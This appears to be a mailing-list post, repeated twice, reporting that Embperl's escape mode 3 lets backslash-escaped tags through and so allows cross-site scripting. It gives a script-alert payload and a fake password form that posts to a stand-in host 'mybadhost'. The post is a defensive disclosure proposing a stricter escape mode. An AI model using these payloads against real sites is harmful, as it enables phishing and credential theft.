Hi,
I just learned more about 'cross site scripting' (XSS) hacks on the
CERT CA-2000-02 advisory and on www.apache.org (please lookup the urls
in the XSS thread on the modperl list, I don't have them handy). So
what does this issue mean to embperl?
Well, I have one major concern: If I'm using $escmode = 3 (which is
pretty standard and secure at a first look) HTML tags are properly
escaped. But there is a backdoor: \<. This makes XSS hacks possible
again and your web site very insecure. Eg. enter in a input field the
following data which is typically display later in a HTML output page:
\<script\>alert('hi, this should never occur')\<script\>
or not so innocent:
\<form action=http://mybadhost/cgi-bin/getpasswd\>\<input type=password\>
Please enter your password for a double check<\form\>
So what I'm suggesting, Gerald, is just a new escape mode which just
never allows backslash escaping tags.
Or am I just telling old stories here?
Dirk
I just learned more about 'cross site scripting' (XSS) hacks on the
CERT CA-2000-02 advisory and on www.apache.org (please lookup the urls
in the XSS thread on the modperl list, I don't have them handy). So
what does this issue mean to embperl?
Well, I have one major concern: If I'm using $escmode = 3 (which is
pretty standard and secure at a first look) HTML tags are properly
escaped. But there is a backdoor: \<. This makes XSS hacks possible
again and your web site very insecure. Eg. enter in a input field the
following data which is typically display later in a HTML output page:
\<script\>alert('hi, this should never occur')\<script\>
or not so innocent:
\<form action=http://mybadhost/cgi-bin/getpasswd\>\<input type=password\>
Please enter your password for a double check<\form\>
So what I'm suggesting, Gerald, is just a new escape mode which just
never allows backslash escaping tags.
Or am I just telling old stories here?
Dirk